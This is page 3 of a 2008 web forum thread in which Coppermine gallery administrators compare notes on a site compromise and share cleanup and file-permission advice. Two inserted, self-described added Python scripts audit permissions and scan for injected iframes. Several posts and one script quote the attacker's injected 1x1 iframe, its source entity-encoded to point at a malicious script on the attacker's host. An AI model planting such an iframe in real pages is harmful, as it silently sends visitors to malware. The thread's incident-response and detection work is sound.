Someone has Redirected my Site to cdpuvbhfzz.com - What do I do? - Page 3

Started by htgguy, April 06, 2008, 10:04:11 PM


Nibbler

Disable the URI uploads feature. Preferably disable all uploading from untrusted users until the new version is released.

mr.goose

Quote from: Tano*87 on April 09, 2008, 06:46:39 PM
OMG guys I get the same thing right yesterday. I've deleted the script code from all the PHP pages (which means that I've edited a lot of pages between coppermine and cutenews and I still haven't retouched the ones from the forum yet) but it comes again today!!!! What do I have to do?

Do like Nibbler says. Also you may want to do some research into security issues with CuteNews. Just because the Coppermine Devs have found an issue in Coppermine, it does not mean that your other web applications are safe. It would be a shame to patch your Coppermine and clean up all those files again, only to find you have been hacked again via CuteNews. For what it's worth, I am undertaking a full security audit on all applications, on all my sites.
Best wishes, G.

Joachim Müller

Do as Nibbler suggested above. Stop shouting and panicking and observe this thread!

Joachim Müller

@Tano*87: do as Nibbler suggested above. Stop shouting and panicking and observe this thread!

@mr.goose: thanks for keeping a level head.

@Nibbler: thanks for taking care of this issue

@everyone else: do not send me (or anyone else) PMs that deal with this issue unless we explicitly ask for it. The next jerk who will send me an unwanted PM is in for a silencer (i.e. a temporary ban). I understand that you're excited about the situation, but it doesn't help to have another "me too" posting here or an invalid report without the needed details. I'm fed up with all the junk in my PM-inbox - don't waste my time nor the time of those who want to help.

>:( >:( >:( Joachim  >:( >:( >:(

NoAhBoDy

well I just got hosed by this at 13:07 CDT...

I wasn't going to post, but just to lighten things up a bit, here's a snippet of the code I found on my gallery (note...my injected file was a .jpg with php content and not .zip)
<?php
//sorry
// Helper from the injected file: returns the part after the last dot in a filename.
function fileExtension($file) {
    $fileExp = explode('.', $file);
    $filetype = $fileExp[count($fileExp) - 1];
    return $filetype;
}

heh...note the "//sorry" :P

NoAhBoDy

Quote from: Nibbler on April 09, 2008, 06:49:46 PM
Disable the URI uploads feature. Preferably disable all uploading from untrusted users until the new version is released.

maybe a stupid question, but where exactly do I do this??
Thanks

sharpo

Quote from: NoAhBoDy on April 09, 2008, 11:15:30 PM
maybe a stupid question, but where exactly do I do this??
Thanks
Look in the documentation, section 4.3 "The group control panel". Set the upload boxes to 0.
Sharpo (not an expert, just a Coppermine user)
3 live galleries, first started in 2006.
http://www.sharpos-world.co.uk/BB3cpg/ with over 8,000 images.
http://www.sharpos-world.co.uk/cpg/ with over 25,000 images. 1.6.25
http://www.sharpos-world.co.uk/kc/ with over 300 images. 1.6.25

sharpo

I'm getting the feeling that somehow they can alter the upload box settings. Mine had all been changed to 0 but now one of them reads 10.

Have a look at this, the problems might be connected in some way?

http://forum.coppermine-gallery.net/index.php/topic,51716.0.html

(I'll apologise in advance for including this here, but I believe it's important!)

mr.goose

Quote from: sharpo on April 10, 2008, 12:10:38 AM
I'm getting the feeling that somehow they can alter the upload box settings. Mine had all been changed to 0 but now one of them reads 10.

Have a look at this, the problems might be connected in some way?

http://forum.coppermine-gallery.net/index.php/topic,51716.0.html

(I'll apologise in advance for including this here, but I believe it's important!)

Certainly seems that the hackers can change (and/or affect) some of the Config settings, Sharpo. These Config settings were changed in my site:-

  • Path to custom header include albums = /userpics/10001/142739_298w3.zip (was blank)
  • Number of levels of categories to display = 1 (was 2)
  • Number of albums to display = 1 (was 50)
  • Number of columns for the album list = 1 (was 5)
  • Number of columns on thumbnail page = 1 (was 5)
  • Number of rows on thumbnail page = 1 (was 10)
  • Maximum number of tabs to display = 5 (was 25)

Looking at other hacked sites, it seems that some config setting must have been changed there too. I guess we just need to sit back and wait and see what the Dev Team comes back with. Meantime I've temporarily denied my webserver write access to the albums folder - since we can't upload anything at the moment anyway. At least if we are re-hacked in a similar manner, then the attacker will have no where to drop the zip file!  ;D
Best wishes, G

sharpo

Quote from: mr.goose on April 10, 2008, 12:42:04 AM
Certainly seems that the hackers can change (and/or affect) some of the Config settings, Sharpo. These Config settings were changed in my site:-

  • Path to custom header include albums = /userpics/10001/142739_298w3.zip (was blank)
  • Number of levels of categories to display = 1 (was 2)
  • Number of albums to display = 1 (was 50)
  • Number of columns for the album list = 1 (was 5)
  • Number of columns on thumbnail page = 1 (was 5)
  • Number of rows on thumbnail page = 1 (was 10)
  • Maximum number of tabs to display = 5 (was 25)

Looking at other hacked sites, it seems that some config setting must have been changed there too. I guess we just need to sit back and wait and see what the Dev Team comes back with. Meantime I've temporarily denied my webserver write access to the albums folder - since we can't upload anything at the moment anyway. At least if we are re-hacked in a similar manner, then the attacker will have no where to drop the zip file!  ;D
Best wishes, G
Just noticed I had a zip file to a custom header, that's a new one on me. Now deleted.

Have also chmod albums to 755

Thanks, Sharpo

mr.goose

Quote from: sharpo on April 10, 2008, 01:08:28 AM
Just noticed I had a zip file to a custom header, that's a new one on me. Now deleted.

Have also chmod albums to 755

Thanks, Sharpo

Make sure you chown -Rv root.root /coppermine too!

If www-data (or whatever your webserver's account is called) still owns the files then it can write to them!
I actually set the directories to 755 and the files to 644, all owned by root. That way, the webserver can read the files, but cannot write to them. It also stops it creating new files and hence stops our hackers uploading any more nasty zip files! :D

Best wishes, G

mr.goose

BTW:-
I also opted for file permissions of 644 rather than 755 because that means the executable bit is not set. So hopefully that will prevent our attacker trying to run any disguised shell scripts etc we may have missed in the cleanup.
Best wishes, G
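The ownership and mode policy mr.goose describes above (directories 0755, files 0644, nothing owned by the webserver account so PHP can read but never write or execute) can be audited with the following script. It is an added example, not code from the thread or from Coppermine; the www-data account name and the root path are assumptions.

```python
import os
import stat
from typing import List, Optional, Tuple

# Policy from this thread: directories 0755, files 0644, and no entry owned by
# the webserver account, so the PHP process cannot alter or drop files.
DIR_MODE = 0o755
FILE_MODE = 0o644


def check_entry(is_dir: bool, mode: int, uid: int, web_uid: Optional[int]) -> List[str]:
    """Return the policy violations for one entry (empty list means compliant)."""
    perm = stat.S_IMODE(mode)
    reasons = []
    if web_uid is not None and uid == web_uid:
        reasons.append("owned by webserver account")
    if perm & 0o022:
        reasons.append("writable by group/other")
    if not is_dir and perm & 0o111:
        reasons.append("execute bit set on file")
    expected = DIR_MODE if is_dir else FILE_MODE
    if perm != expected:
        reasons.append("mode %o, expected %o" % (perm, expected))
    return reasons


def audit_tree(root: str, web_uid: Optional[int]) -> List[Tuple[str, str]]:
    """Walk root and report every (path, reason) that violates the policy."""
    problems = []
    for dirpath, _, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                # A symlink can point outside the tree; flag it for manual review.
                problems.append((path, "symbolic link"))
                continue
            for reason in check_entry(stat.S_ISDIR(st.st_mode), st.st_mode, st.st_uid, web_uid):
                problems.append((path, reason))
    return problems


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."   # assumed: web root passed as argv[1]
    try:
        import pwd
        web_uid = pwd.getpwnam("www-data").pw_uid       # assumed webserver account name
    except (ImportError, KeyError):
        web_uid = None
    for path, reason in audit_tree(root, web_uid):
        print("%s: %s" % (path, reason))
```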

sharpo

Quote from: mr.goose on April 10, 2008, 01:36:29 AM
BTW:-
I also opted for file permissions of 644 rather than 755 because that means the executable bit is not set. So hopefully that will prevent our attacker trying to run any disguised shell scripts etc we may have missed in the cleanup.
Best wishes, G
I mistyped earlier, I had changed them to 644 not 755.

Another thing I noticed, I have a 4th gallery which I am still in the process of working on, about an hour ago a docs.php file was uploaded to the plugins folder - this I believe was similar to files that have been posted here earlier in the thread with the iframe line in the middle of the document.

I have since removed the plugins folder completely for that gallery (got a backup though)

That's it for tonight, had enough.

marian

I've read through this and am still unsure what to do. Unfortunately this is one of the rare nights our webmaster cannot be contacted.
We are not getting redirects to cdpuvbhfzzu but error messages. News indexes are, for example, showing Parse error: syntax error, unexpected '<' in /home/bymnews/public_html/news/classes/ProcessNews.class.php on line 248
Gallery looks normal here http://www.bymnews.com/photos/
but if you click on first item - America's Cup- it comes up with one thumbnail and latest additions vertically down page. http://www.bymnews.com/photos/index.php?cat=33
Can anyone give a step by step guide to what should be done?

mr.goose

Quote from: marian on April 10, 2008, 02:08:37 AM
I've read through this and am still unsure what to do. Unfortunately this is one of the rare nights our webmaster cannot be contacted.
We are not getting redirects to cdpuvbhfzzu but error messages. News indexes are, for example, showing Parse error: syntax error, unexpected '<' in /home/bymnews/public_html/news/classes/ProcessNews.class.php on line 248
Gallery looks normal here http://www.bymnews.com/photos/
but if you click on first item - America's Cup- it comes up with one thumbnail and latest additions vertically down page. http://www.bymnews.com/photos/index.php?cat=33
Can anyone give a step by step guide to what should be done?

Sorry to tell you this but you have been hacked - several times by the look of it. View the page source on your main page and you'll see line after line pointing at the hackers server http://cdpuvbhfzz.com/dl/adv598.php in obfuscated code....

Quote
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>

Other problem is that it seems you are running quite an old version of Coppermine, version 1.4.5. Anyway, whether you remove the hack line by line from each and every infected file or you simply replace everything from a clean backup is up to you. Hopefully the Dev Team will have a patch pretty soon. But this is a sophisticated hack and I guess it may take a while to write the patch. And even with the patch, you'll still have to clean up the mess.

Best wishes, G.
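The injected tag quoted above hides its destination behind HTML numeric character references and a 1x1 frame. The following scanner, an added example rather than code from the thread or from Coppermine, decodes such references and flags hidden or obfuscated iframes across a web root; the sample file content is constructed, and the file extensions scanned are an assumption.

```python
import html
import os
import re
from typing import Dict, List

# Constructed sample of an infected page: the src is spelled with &#NNN;
# references so the hostname never appears in plain text, as in this thread.
SAMPLE_INFECTED = (
    "<?php\n"
    "// ordinary gallery code\n"
    "echo 'hello';\n"
    "?>\n"
    '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;'
    "&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;"
    '&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1>'
    "</iframe>\n"
)
SAMPLE_CLEAN = '<iframe src="https://example.org/video" width=640 height=360></iframe>\n'

IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE)
DIM_RE = re.compile(r"""\b(width|height)\s*=\s*["']?(\d+)""", re.IGNORECASE)


def analyse_iframes(text: str) -> List[Dict[str, object]]:
    """Describe every <iframe> in text; 'suspicious' marks hidden or obfuscated ones."""
    findings = []
    for tag_match in IFRAME_TAG_RE.finditer(text):
        tag = tag_match.group(0)
        src_match = SRC_RE.search(tag)
        if not src_match:
            continue
        raw_src = next(g for g in src_match.groups() if g is not None)
        decoded_src = html.unescape(raw_src)      # resolves &#NNN; and named references
        dims = {k.lower(): int(v) for k, v in DIM_RE.findall(tag)}
        hidden = all(dims.get(d, 9999) <= 1 for d in ("width", "height"))
        obfuscated = raw_src != decoded_src       # src only readable after decoding
        findings.append({
            "line": text.count("\n", 0, tag_match.start()) + 1,
            "src": decoded_src,
            "hidden": hidden,
            "obfuscated": obfuscated,
            "suspicious": hidden or obfuscated,
        })
    return findings


def scan_tree(root: str, exts=(".php", ".html", ".htm", ".js")) -> List[Dict[str, object]]:
    """Walk a web root and return the suspicious iframes with the file they live in."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for finding in analyse_iframes(fh.read()):
                    if finding["suspicious"]:
                        results.append(dict(finding, file=path))
    return results
```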

marian

Quote from: mr.goose on April 10, 2008, 02:52:34 AM
Sorry to tell you this but you have been hacked - several times by the look of it. View the page source on your main page and you'll see line after line pointing at the hackers server http://cdpuvbhfzz.com/dl/adv598.php in obfuscated code....

Other problem is that it seems you are running quite an old version of Coppermine, version 1.4.5. Anyway, whether you remove the hack line by line from each and every infected file or you simply replace everything from a clean backup is up to you. Hopefully the Dev Team will have a patch pretty soon. But this is a sophisticated hack and I guess it may take a while to write the patch. And even with the patch, you'll still have to clean up the mess.

Best wishes, G.
Yes I know we have been hacked.
One thing I find very interesting is that when I was accessing our site on one of my laptops I got a Trend message saying I was being attacked by VIRUS XML HACK AQ. I could not read what Trend had done about it because the laptop planted and when I rebooted it came up with an unrecoverable system error.
So I went onto the Trend site and found it had no knowledge of XML HACK AQ that it had warned me about, nor any recognition of cdpuvbhfzz
We have phoned Trend Australia - northern hemisphere offices being closed - and they know nothing about this. Seems weird to me.

mr.goose

Quote from: marian on April 10, 2008, 03:59:13 AM
Yes I know we have been hacked.
One thing I find very interesting is that when I was accessing our site on one of my laptops I got a Trend message saying I was being attacked by VIRUS XML HACK AQ. I could not read what Trend had done about it because the laptop planted and when I rebooted it came up with an unrecoverable system error.
So I went onto the Trend site and found it had no knowledge of XML HACK AQ that it had warned me about, nor any recognition of cdpuvbhfzz
We have phoned Trend Australia - northern hemisphere offices being closed - and they know nothing about this. Seems weird to me.

Hmm nasty. I run Linux on all my PCs and have not been affected by looking at any of the affected sites (touch wood!). But I have been unable to de-obfuscate the javascript generated by adv598.php either, so I still have no idea what it contains - though it has the potential to be very nasty. Of course, if it is a virus, (and I say if) then any windows user looking at your site could be at risk. You might want to give Trend another call and point them to the hacker's server:- http://cdpuvbhfzz.com/dl/adv598.php and see what they make of the script? I would certainly be interested to know.
Best wishes, G

Llama8668

So is this definitely a Coppermine issue (and if so is it worth disabling it until a fix is found - having to reupload every PHP file for a site is soul destroying  :-[)?

I've been hit with the same attack (twice on one site, once on another). The code is replicated across all PHP files (which is a mess to clean up). The first time around the coppermine gallery was 4.12 and the second it was 4.1.6.

It's resolved by re-uploading all files again (and you need to add in some configuration changes as things like album and column are messed up). On each restored gallery though I get errors when attempting to batch add new files (which is why I came to the forum initially) which states Unable to create thumbnail or reduced size image.

Personally I was leaning towards the attacker coming in through either some of my custom php code or the cutenews cms script. If it helps here are some of the logs which were leading me to that belief (I'm not an expert it's just the frequent rapid calls to the scripts made me suspicious).

[09/04/2008 16:38:29] NOTICE:  Undefined variable:  template in line 42 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  show in line 43 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  POST in line 32 of file /DIRECTORY/STRUCTURE/cutenews/show_news.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  CN_HALT in line 67 of file /DIRECTORY/STRUCTURE/cutenews/show_news.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  static in line 67 of file /DIRECTORY/STRUCTURE/cutenews/show_news.php
[09/04/2008 16:38:29] NOTICE:  Undefined index:   in line 313 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  my_q in line 322 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  my_q in line 324 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined index:   in line 313 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  my_q in line 322 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  my_q in line 324 of file /DIRECTORY/STRUCTURE/cutenews/inc/functions.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  1 in line 14 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  2 in line 15 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined variable:  member_db_line in line 54 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  4 in line 56 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  7 in line 64 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  5 in line 64 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php
[09/04/2008 16:38:29] NOTICE:  Undefined offset:  2 in line 65 of file /DIRECTORY/STRUCTURE/cutenews/inc/shows.inc.php


[09/04/2008 16:12:12] WARNING:  main() [&lt;a href='function.include'&gt;function.include&lt;/a&gt;]: Failed opening '/DIRECTORY/STRUCTURE/Functions/Cache_End.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:15:52] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:15:52] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:15:52] WARNING:  main() [&lt;a href='function.include'&gt;function.include&lt;/a&gt;]: Failed opening '/DIRECTORY/STRUCTURE/Functions/Cache_End.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:19:56] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:19:56] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:19:56] WARNING:  main() [&lt;a href='function.include'&gt;function.include&lt;/a&gt;]: Failed opening '/DIRECTORY/STRUCTURE/Functions/Cache_End.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:22:07] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php
[09/04/2008 16:22:07] WARNING:  main(/DIRECTORY/STRUCTURE/Functions/Cache_End.php) [&lt;a href='function.main'&gt;function.main&lt;/a&gt;]: failed to open stream: No such file or directory in line 88 of file /DIRECTORY/STRUCTURE/index.php

marian

Quote from: mr.goose on April 10, 2008, 04:24:06 AM
You might want to give Trend another call and point them to the hacker's server:- http://cdpuvbhfzz.com/dl/adv598.php and see what they make of the script? I would certainly be interested to know.
Best wishes, G
Phones engaged, voice mail on, but have emailed my direct contact with that info.

mr.goose

@ Llama8668:
There appears to be an issue with Coppermine. However that does not mean there isn't an issue with other PHP scripts as well. I guess we'll know more when the Coppermine Dev team comes back with a patch and its recommendations.

@ Marian:
I'm really interested to hear what Trend has to say. I'm as keen to find out what's behind this as I am to get a fix. However, it seems this is something relatively new so there may not be any quick answers.

Anyway, it's 4 AM here in Old Blighty and I am going to hit the hay if you'll excuse me. I spent most of last night researching this too and I'm more than a little sleepy. Good night all.  :D

Best wishes, G